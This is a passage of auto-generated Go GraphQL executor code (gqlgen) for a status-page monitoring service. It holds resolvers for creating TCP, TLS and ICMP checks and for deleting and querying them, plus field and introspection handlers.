if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "Mutation",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: true,
}
ctx = graphql.WithFieldContext(ctx, fc)
rawArgs := field.ArgumentMap(ec.Variables)
args, err := ec.field_Mutation_createTcpCheck_args(ctx, rawArgs)
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
fc.Args = args
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return ec.resolvers.Mutation().CreateTCPCheck(rctx, args["input"].(models.CreateTCPCheckInput))
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(models.Check)
fc.Result = res
return ec.marshalNCheck2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCheck(ctx, field.Selections, res)
}
func (ec *executionContext) _Mutation_createTlsCheck(ctx context.Context, field graphql.CollectedField) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "Mutation",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: true,
}
ctx = graphql.WithFieldContext(ctx, fc)
rawArgs := field.ArgumentMap(ec.Variables)
args, err := ec.field_Mutation_createTlsCheck_args(ctx, rawArgs)
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
fc.Args = args
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return ec.resolvers.Mutation().CreateTLSCheck(rctx, args["input"].(models.CreateTLSCheckInput))
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(models.Check)
fc.Result = res
return ec.marshalNCheck2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCheck(ctx, field.Selections, res)
}
func (ec *executionContext) _Mutation_createIcmpCheck(ctx context.Context, field graphql.CollectedField) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "Mutation",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: true,
}
ctx = graphql.WithFieldContext(ctx, fc)
rawArgs := field.ArgumentMap(ec.Variables)
args, err := ec.field_Mutation_createIcmpCheck_args(ctx, rawArgs)
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
fc.Args = args
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return ec.resolvers.Mutation().CreateIcmpCheck(rctx, args["input"].(models.CreateIcmpCheckInput))
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(models.Check)
fc.Result = res
return ec.marshalNCheck2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCheck(ctx, field.Selections, res)
}
func (ec *executionContext) _Mutation_deleteCheck(ctx context.Context, field graphql.CollectedField) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "Mutation",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: true,
}
ctx = graphql.WithFieldContext(ctx, fc)
rawArgs := field.ArgumentMap(ec.Variables)
args, err := ec.field_Mutation_deleteCheck_args(ctx, rawArgs)
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
fc.Args = args
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return ec.resolvers.Mutation().DeleteCheck(rctx, args["id"].(string))
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(*models.DeleteResponse)
fc.Result = res
return ec.marshalNDeleteResponse2ᚖgithubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐDeleteResponse(ctx, field.Selections, res)
}
func (ec *executionContext) _PollResult_took(ctx context.Context, field graphql.CollectedField, obj *models.PollResult) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "PollResult",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Took, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(int)
fc.Result = res
return ec.marshalNInt2int(ctx, field.Selections, res)
}
func (ec *executionContext) _Query_checks(ctx context.Context, field graphql.CollectedField) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "Query",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: true,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return ec.resolvers.Query().Checks(rctx)
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.([]models.Check)
fc.Result = res
return ec.marshalOCheck2ᚕgithubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCheckᚄ(ctx, field.Selections, res)
}
func (ec *executionContext) _Query_executions(ctx context.Context, field graphql.CollectedField) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "Query",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: true,
}
ctx = graphql.WithFieldContext(ctx, fc)
rawArgs := field.ArgumentMap(ec.Variables)
args, err := ec.field_Query_executions_args(ctx, rawArgs)
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
fc.Args = args
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return ec.resolvers.Query().Executions(rctx, args["checkId"].(string), args["from"].(*time.Time), args["until"].(*time.Time))
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.([]*models.CheckExecution)
fc.Result = res
return ec.marshalOCheckExecution2ᚕᚖgithubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCheckExecutionᚄ(ctx, field.Selections, res)
}
func (ec *executionContext) _Query___type(ctx context.Context, field graphql.CollectedField) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "Query",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
rawArgs := field.ArgumentMap(ec.Variables)
args, err := ec.field_Query___type_args(ctx, rawArgs)
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
fc.Args = args
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return ec.introspectType(args["name"].(string))
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*introspection.Type)
fc.Result = res
return ec.marshalO__Type2ᚖgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐType(ctx, field.Selections, res)
}
func (ec *executionContext) _Query___schema(ctx context.Context, field graphql.CollectedField) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "Query",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return ec.introspectSchema()
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*introspection.Schema)
fc.Result = res
return ec.marshalO__Schema2ᚖgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐSchema(ctx, field.Selections, res)
}
func (ec *executionContext) _TcpCheck_id(ctx context.Context, field graphql.CollectedField, obj *models.TCPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TcpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.ID, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNID2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TcpCheck_identifier(ctx context.Context, field graphql.CollectedField, obj *models.TCPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TcpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Identifier, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TcpCheck_frecuency(ctx context.Context, field graphql.CollectedField, obj *models.TCPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TcpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Frecuency, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TcpCheck_address(ctx context.Context, field graphql.CollectedField, obj *models.TCPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TcpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Address, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TcpCheck_status(ctx context.Context, field graphql.CollectedField, obj *models.TCPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TcpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Status, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TcpCheck_latestCheck(ctx context.Context, field graphql.CollectedField, obj *models.TCPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TcpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.LatestCheck, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*time.Time)
fc.Result = res
return ec.marshalOTime2ᚖtimeᚐTime(ctx, field.Selections, res)
}
func (ec *executionContext) _TcpCheck_message(ctx context.Context, field graphql.CollectedField, obj *models.TCPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TcpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Message, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TcpCheck_errorMsg(ctx context.Context, field graphql.CollectedField, obj *models.TCPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TcpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.ErrorMsg, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TlsCheck_id(ctx context.Context, field graphql.CollectedField, obj *models.TLSCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TlsCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.ID, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNID2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TlsCheck_identifier(ctx context.Context, field graphql.CollectedField, obj *models.TLSCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TlsCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Identifier, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TlsCheck_frecuency(ctx context.Context, field graphql.CollectedField, obj *models.TLSCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TlsCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Frecuency, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TlsCheck_address(ctx context.Context, field graphql.CollectedField, obj *models.TLSCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TlsCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Address, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TlsCheck_status(ctx context.Context, field graphql.CollectedField, obj *models.TLSCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TlsCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Status, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TlsCheck_latestCheck(ctx context.Context, field graphql.CollectedField, obj *models.TLSCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TlsCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.LatestCheck, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*time.Time)
fc.Result = res
return ec.marshalOTime2ᚖtimeᚐTime(ctx, field.Selections, res)
}
func (ec *executionContext) _TlsCheck_message(ctx context.Context, field graphql.CollectedField, obj *models.TLSCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TlsCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Message, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TlsCheck_errorMsg(ctx context.Context, field graphql.CollectedField, obj *models.TLSCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TlsCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.ErrorMsg, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) ___Directive_name(ctx context.Context, field graphql.CollectedField, obj *introspection.Directive) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Directive",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Name, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) ___Directive_description(ctx context.Context, field graphql.CollectedField, obj *introspection.Directive) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Directive",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Description, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalOString2string(ctx, field.Selections, res)
}
func (ec *executionContext) ___Directive_locations(ctx context.Context, field graphql.CollectedField, obj *introspection.Directive) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Directive",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Locations, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.([]string)
fc.Result = res
return ec.marshalN__DirectiveLocation2ᚕstringᚄ(ctx, field.Selections, res)
}
func (ec *executionContext) ___Directive_args(ctx context.Context, field graphql.CollectedField, obj *introspection.Directive) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Directive",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Args, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.([]introspection.InputValue)
fc.Result = res
return ec.marshalN__InputValue2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐInputValueᚄ(ctx, field.Selections, res)
}
func (ec *executionContext) ___EnumValue_name(ctx context.Context, field graphql.CollectedField, obj *introspection.EnumValue) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__EnumValue",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Name, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) ___EnumValue_description(ctx context.Context, field graphql.CollectedField, obj *introspection.EnumValue) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__EnumValue",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Description, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalOString2string(ctx, field.Selections, res)
}
func (ec *executionContext) ___EnumValue_isDeprecated(ctx context.Context, field graphql.CollectedField, obj *introspection.EnumValue) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__EnumValue",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.IsDeprecated(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(bool)
fc.Result = res
return ec.marshalNBoolean2bool(ctx, field.Selections, res)
}
func (ec *executionContext) ___EnumValue_deprecationReason(ctx context.Context, field graphql.CollectedField, obj *introspection.EnumValue) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__EnumValue",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.DeprecationReason(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*string)
fc.Result = res
return ec.marshalOString2ᚖstring(ctx, field.Selections, res)
}
func (ec *executionContext) ___Field_name(ctx context.Context, field graphql.CollectedField, obj *introspection.Field) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Field",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
